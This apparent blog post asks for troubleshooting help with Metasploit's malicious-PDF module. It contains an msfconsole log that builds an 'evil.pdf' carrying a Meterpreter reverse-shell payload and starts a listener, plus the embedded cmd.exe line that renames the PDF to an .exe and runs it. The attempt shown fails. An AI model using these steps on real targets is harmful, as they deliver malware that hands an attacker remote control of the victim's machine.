What am i not doing right?


Hackers For Charity

Hi,
Its been around 1 month since colin ames and valsmith of metasploit released metasphish and adobe_pdf exploit (http://blog.attackresearch.com/publications/metaphish). been trying adobe_pdf exploit for almost a month, After i transfer the pdf file to windows, i still get a “c:\\windows\system32\cmd.exe /Q /C (if exist “%HOMEPATH%\My Documents\hi.pdf” (cd “%HOMEPATH%\My Documents”))&(if exist “%HOMEPATH%\Desktop\hi.pdf” (cd “%HOMEPATH%\Desktop”))&&(ren hi.pdf hi.exe&start hi.exe)” error and another error “system cannot find the specified file” on cmd. and my multi/handler doesnt pick up any reverse shells. M using adobe 9 on windows. M saving the pdf to my windows desktop.Any pointers will be appreciated. log is shown below. I have also tried out a new adobe_pdf module by peterhefley here. http://trac.metasploit.com/ticket/335.
Pointerz pliz……………..

msf exploit(handler) > back
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME hi.pdf
INFILENAME => hi.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in ‘hi.pdf’…
[*] Parseing ‘hi.pdf’…
[*] Parseing Successfull.
[*] Using ‘windows/meterpreter/reverse_tcp’ as payload…
[*] Creating ‘evil.pdf’ file…
[*] Generated output file /pentest/exploits/framework3/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler…

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s